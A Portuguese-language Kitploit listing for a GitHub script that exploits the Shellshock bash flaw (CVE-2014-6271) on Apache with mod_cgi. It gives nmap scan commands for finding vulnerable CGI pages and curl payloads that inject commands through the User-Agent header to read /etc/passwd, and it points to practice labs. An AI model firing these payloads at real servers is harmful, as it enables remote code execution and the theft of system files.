Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-6271 — Exploração da vulnerabilidade "Shellshock". Execução remota de código no Apache com mod_cgi | Kitploit
Ferramentas/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

Exploração da vulnerabilidade "Shellshock". Execução remota de código no Apache com mod_cgi

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploração do Shellshock (CVE-2014-6271)

Shellshock é efetivamente uma vulnerabilidade de Execução Remota de Comandos no BASH. Este script explora a vulnerabilidade no ambiente web em Apache ou similares com mod_cgi habilitado. A vulnerabilidade reside na manipulação de variáveis de ambiente, que são valores nomeados dinâmicos que afetam como os processos são executados em um computador. Atacantes podem explorar isso anexando código malicioso a variáveis de ambiente, que é executado ao receber a variável. Isso permite que atacantes potencialmente comprometam o sistema.

Laboratório para teste de vulnerabilidades

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

Encontre páginas CGI-BIN:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Teste manual:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

Aviso:

Não sou responsável por qualquer uso ilegal ou dano causado por esta ferramenta. Foi escrita por diversão, não para o mal, e tem como objetivo conscientizar sobre hacking e segurança cibernética

Bom Hacking :)

Baixar ferramenta